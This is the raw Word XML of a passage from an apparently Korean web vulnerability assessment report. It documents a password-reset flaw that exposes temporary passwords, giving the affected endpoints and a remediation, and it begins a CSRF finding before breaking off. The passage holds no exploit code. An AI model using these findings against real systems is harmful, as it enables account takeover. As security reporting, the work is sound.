              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251575296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3125D490" wp14:editId="7F127A64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3915410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1480185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="588818" cy="120650"/>
                <wp:effectExtent l="0" t="0" r="20955" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474644" name="직사각형 1951474644"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="588818"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09FC5" id="직사각형 1951474644" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:308.3pt;margin-top:116.55pt;width:46.35pt;height:9.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N6twIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mGnDhG5MBI4KJA&#10;kAR1iqxpirIEUByWpC27u/QOBXqDbrrouYr0Dh1Snxhp0EVRL2iOZuYN583n7HxXS7IVxlagMpoc&#10;xZQIxSGv1DqjH+4WbyaUWMdUziQokdG9sPR89vrVWaOnYgQlyFwYgiDKThud0dI5PY0iy0tRM3sE&#10;WihUFmBq5lA06yg3rEH0WkajOD6OGjC5NsCFtfj1slXSWcAvCsHdTVFY4YjMKL7NhdOEc+XPaHbG&#10;pmvDdFnx7hnsH15Rs0ph0AHqkjlGNqb6A6quuAELhTviUEdQFBUXIQfMJomfZbMsmRYhFyTH6oEm&#10;+/9g+fX21pAqx9qdjpP0JD1OU0oUq7FWj98eHj9///nj4dfXL+RAjZw12k7RdalvTSdZvHoCdoWp&#10;/T+mRnaB5/3As9g5wvHjeDKZJNgYHFXJKD4ehzpET87aWPdWQE38JaMGyxjYZdsr6zAgmvYmPpaC&#10;RSVlKKVUpPG5xIjpVRZklXttEMx6dSEN2TLshsUixp9vAEQ7MENJKvzoU2yTCje3l8JjSPVeFEgY&#10;pjFqI/hWFQMs41wol7SqkuWijTY+DNZ7hNAB0CMX+MoBuwPoLVuQHrt9c2fvXUXo9MG5S/1vzoNH&#10;iAzKDc51pcC8lJnErLrIrX1PUkuNZ2kF+R7byUA7Z1bzRYUVvGLW3TKDg4UjiMvC3eBRSMBKQXej&#10;pATz6aXv3h77HbWUNDioGbUfN8wISuQ7hZNwmqSpn+wgpOOTEQrmULM61KhNfQFY/QTXkubh6u2d&#10;7K+Fgfoed8rcR0UVUxxjZ5Q70wsXrl0guJW4mM+DGU6zZu5KLTX34J5V36F3u3tmdNfGDvv/Gvqh&#10;ZtNn3dzaek8F842Dogqt/sRrxzdugtA43dbyq+ZQDlZPu3X2GwAA//8DAFBLAwQUAAYACAAAACEA&#10;9fPC1eAAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkbixtKtqtNJ0ACSEQ&#10;BxjsnjVeWy1xqiZry9sTTnC0/en391fbxRo24eh7RxLSVQIMqXG6p1bC1+fTzRqYD4q0Mo5Qwjd6&#10;2NaXF5UqtZvpA6ddaFkMIV8qCV0IQ8m5bzq0yq/cgBRvRzdaFeI4tlyPao7h1nCRJDm3qqf4oVMD&#10;PnbYnHZnK+HdnY7c7IV4LR6eRfFi13M7vUl5fbXc3wELuIQ/GH71ozrU0engzqQ9MxLyNM8jKkFk&#10;WQosEkWyyYAd4uZWpMDriv/vUP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAFPDercC&#10;AACjBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA9fPC&#10;1eAAAAALAQAADwAAAAAAAAAAAAAAAAARBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00522F2B" w:rsidRPr="00C9688D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D579DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="616908A7" wp14:editId="02EE4445">
            <wp:extent cx="4572000" cy="2024096"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="14605"/>
            <wp:docPr id="1951474643" name="그림 1951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41928" r="1781" b="19417"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="20240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51D23" w14:textId="24839708" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="_Toc20909461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41</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008B4898">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로그인 페이지에서 </w:t>
      </w:r>
      <w:r w:rsidR="008B4898">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008B4898">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀번호 재설정</w:t>
      </w:r>
      <w:r w:rsidR="008B4898">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008B4898">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="402"/>
    </w:p>
    <w:p w14:paraId="7EABAC57" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFF83A3" w14:textId="209345AA" w:rsidR="00522F2B" w:rsidRDefault="00D579DA" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251570176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74F37C7C" wp14:editId="09BDBAF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3010881</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1543512</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="590550" cy="209550"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474642" name="직사각형 1951474642"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5905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3ED9" id="직사각형 1951474642" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:237.1pt;margin-top:121.55pt;width:46.5pt;height:16.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lhtQIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdR0pJVN1XUKgip&#10;aita1LPj9WZX8nqM7WQTbvAOSLwBFw48FyrvwNje3Ual4oDIwfHszHzj+ebn9GzXSLIVxtagcjo6&#10;SikRikNRq3VO398tX72mxDqmCiZBiZzuhaVn85cvTludiTFUIAthCIIom7U6p5VzOksSyyvRMHsE&#10;WihUlmAa5lA066QwrEX0RibjND1OWjCFNsCFtfj1IirpPOCXpeDuuiytcETmFN/mwmnCufJnMj9l&#10;2dowXdW8ewb7h1c0rFYYdIC6YI6Rjan/gGpqbsBC6Y44NAmUZc1FyAGzGaVPsrmtmBYhFyTH6oEm&#10;+/9g+dX2xpC6wNrNpqPJyeR4MqZEsQZr9fDt08Pn7z9/fPr19Qs5UCNnrbYZut7qG9NJFq+egF1p&#10;Gv+PqZFd4Hk/8Cx2jnD8OJ2l0ylWg6NqnM78HVGSR2dtrHsjoCH+klODZQzssu2lddG0N/GxFCxr&#10;KfE7y6Qirc8lRUwvW5B14bVBMOvVuTRky7AblssUf13gAzN8hlT4Gp9iTCrc3F6KGOCdKJEwTGMc&#10;I/hWFQMs41woN4qqihUiRpseBus9Qs5SIaBHLvGVA3YH0FtGkB47MtDZe1cROn1w7lL/m/PgESKD&#10;coNzUyswz2UmMasucrTvSYrUeJZWUOyxnQzEObOaL2us4CWz7oYZHCwsOi4Ld41HKQErBd2NkgrM&#10;x+e+e3vsd9RS0uKg5tR+2DAjKJFvFU7CbDSZ+MkOwmR6MkbBHGpWhxq1ac4Bqz/CtaR5uHp7J/tr&#10;aaC5x52y8FFRxRTH2DnlzvTCuYsLBLcSF4tFMMNp1sxdqlvNPbhn1Xfo3e6eGd21scP+v4J+qFn2&#10;pJujrfdUsNg4KOvQ6o+8dnzjJgiN020tv2oO5WD1uFvnvwEAAP//AwBQSwMEFAAGAAgAAAAhABMS&#10;YFnfAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sbSjN1DWdAAkhEAcY&#10;7J41XlutSaoma8vbY05w9O9Pvz+X28X2bMIxdN4pSFcJMHS1N51rFHx9Pt2sgYWondG9d6jgGwNs&#10;q8uLUhfGz+4Dp11sGJW4UGgFbYxDwXmoW7Q6rPyAjnZHP1odaRwbbkY9U7ntuUiSnFvdObrQ6gEf&#10;W6xPu7NV8O5PR97vhXiVD89Cvtj13ExvSl1fLfcbYBGX+AfDrz6pQ0VOB392JrBeQSYzQagCkd2m&#10;wIi4yyUlB0pkngKvSv7/h+oHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAeJl5YbUCAACj&#10;BQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAExJgWd8A&#10;AAALAQAADwAAAAAAAAAAAAAAAAAPBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABsG&#10;AAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00522F2B" w:rsidRPr="00D76F80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA47DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2C6A23" wp14:editId="4EB9B261">
            <wp:extent cx="4572000" cy="1979196"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="1444394020" name="그림 14443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032" t="45702" r="24995" b="11946"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1979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5DBAA1" w14:textId="7A960361" w:rsidR="002C02C8" w:rsidRDefault="00522F2B" w:rsidP="002C02C8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="_Toc20909461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42</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00480DEA">
        <w:t>guest</w:t>
      </w:r>
      <w:r w:rsidR="00480DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 대한 정보 입력 후 </w:t>
      </w:r>
      <w:r w:rsidR="00480DEA">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00480DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀번호 재설정</w:t>
      </w:r>
      <w:r w:rsidR="00480DEA">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00480DEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p w14:paraId="3ECAA688" w14:textId="77777777" w:rsidR="002C02C8" w:rsidRDefault="002C02C8" w:rsidP="002C02C8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D97823" w14:textId="0CCD65E4" w:rsidR="002C02C8" w:rsidRDefault="002C02C8" w:rsidP="002C02C8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="006C2D0D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB49210" wp14:editId="44FD0341">
            <wp:extent cx="4572000" cy="2199241"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="1444394021" name="그림 14443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074" r="28995" b="61127"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="21992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875863" w14:textId="0259FF4A" w:rsidR="002C02C8" w:rsidRDefault="002C02C8" w:rsidP="002C02C8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="404" w:name="_Toc209094616"/>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43</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>임시 비밀번호 노출 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="404"/>
    </w:p>
    <w:p w14:paraId="18973A69" w14:textId="77777777" w:rsidR="002C02C8" w:rsidRDefault="002C02C8" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78394E8B" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRPr="00CB22A6" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">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522F2B" w:rsidRPr="00B112DB" w14:paraId="6F13F1EC" w14:textId="77777777" w:rsidTr="005E1156">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49871066"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5D8CF417"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037D0ACC"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2B7A8A" w:rsidRPr="00B112DB" w14:paraId="3238B2F4"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B34E551" w14:textId="22A9EFF6" w:rsidR="002B7A8A" w:rsidRPr="00CB22A6" w:rsidRDefault="002B7A8A" w:rsidP="002B7A8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4E348F" w14:textId="5611FFC5" w:rsidR="002B7A8A" w:rsidRPr="00CB22A6" w:rsidRDefault="002B7A8A" w:rsidP="002B7A8A">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br/>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>비밀번호 재설정</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E432D96" w14:textId="3BC8BB59" w:rsidR="002B7A8A" w:rsidRPr="00CB22A6" w:rsidRDefault="002B7A8A" w:rsidP="002B7A8A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00225909">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:8080/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>findPw.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7A8A" w:rsidRPr="00B112DB" w14:paraId="2C961CC5"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435FDDA" w14:textId="7D4739D7" w:rsidR="002B7A8A" w:rsidRPr="00CB22A6" w:rsidRDefault="002B7A8A" w:rsidP="002B7A8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586B69" w14:textId="291EC9B9" w:rsidR="002B7A8A" w:rsidRDefault="002B7A8A" w:rsidP="002B7A8A">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br/>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>아이디 찾기</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91D8577" w14:textId="1EC8197B" w:rsidR="002B7A8A" w:rsidRPr="00987A57" w:rsidRDefault="002B7A8A" w:rsidP="002B7A8A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/findId.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="419CEC9F" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2E5B24" w14:textId="77777777" w:rsidR="00522F2B" w:rsidRPr="00CB22A6" w:rsidRDefault="00522F2B" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B4393" w14:textId="7028C55A" w:rsidR="00522F2B" w:rsidRDefault="00BF7881" w:rsidP="00522F2B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7881">
        <w:t xml:space="preserve"> 패스워드를 발급하거나 확인할 때는 웹 사이트에 직접 노출하지 말고, 인증된 사용자에게 메일 또는 SMS를 통해 전달해야 합니다. 또한 패스워드 재발급 검증 시도에 대해 임계값을 설정하여 일정 횟수 이상 </w:t>
      </w:r>
      <w:r w:rsidR="00022E94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">실패하면 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7881">
        <w:t>해당 기능을 차단하거나 다른 인증 절차를 통해 제공해야 합니다. 임시 패스워드를 발급받은 사용자는 즉시 새로운 패스워드로 변경하도록 구현해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E930EDB" w14:textId="4D9AC7DF" w:rsidR="00166D19" w:rsidRDefault="00166D19">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3021B" w14:textId="51DA525E" w:rsidR="00166D19" w:rsidRDefault="0084735B" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="_Toc209094563"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>크</w:t>
      </w:r>
      <w:r w:rsidR="00021759">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로스사이트 리퀘스트 변조(</w:t>
      </w:r>
      <w:r w:rsidR="00021759">
        <w:t>CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="25D490E3" w14:textId="77777777" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024DF7C1" w14:textId="3419C767" w:rsidR="00166D19" w:rsidRDefault="00EA473B" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증된 사용자 브라우저의 쿠키 및 세션</w:t>
      </w:r>
      <w:r w:rsidR="00F56F8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 포함해서 서버로 요청을 보내는 기능을 악용하여 사용자가 의도하지 않은 상태 변화를 수행하도록 만드는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서버가 정상 경로나 출처를 검증하지 않거나 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">토큰 및 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Origin/Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>검증이 부재할 때 나타날 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343E2A13" w14:textId="77777777" w:rsidR="005571AA" w:rsidRDefault="005571AA" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042651E7" w14:textId="77777777" w:rsidR="00166D19" w:rsidRPr="00CB22A6" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D20B388" w14:textId="6D89CC27" w:rsidR="00166D19" w:rsidRPr="00CB22A6" w:rsidRDefault="00630B96" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630B96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00630B96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 애플리케이션에서 요청 검증 절차가 부재하여 CSRF(Cross-Site Request Forgery) 공격이 가능한 취약점이 확인되었습니다. 이로 </w:t>
      </w:r>
      <w:r w:rsidR="000E405C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인해</w:t>
      </w:r>
      <w:r w:rsidRPr="00630B96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격자가 사용자의 브라우저를 이용해 의도치 않은 요청을 서버에 전송할 수 있으며, 정상 사용자의 권한으로 계정 정보 변경, 권한 상승 등 중요 기능이 악용될 수 있는 위험이 존재하는 것으로 확인됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94441B" w14:textId="77777777" w:rsidR="00166D19" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2505BD51" w14:textId="3105A9A0" w:rsidR="00166D19" w:rsidRPr="00CB22A6" w:rsidRDefault="00166D19" w:rsidP="00166D19">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251580416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B10B580" wp14:editId="39729EDE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1219835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1588770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4246129" cy="207819"/>
                <wp:effectExtent l="0" t="0" r="21590" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474652" name="직사각형 1951474652"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
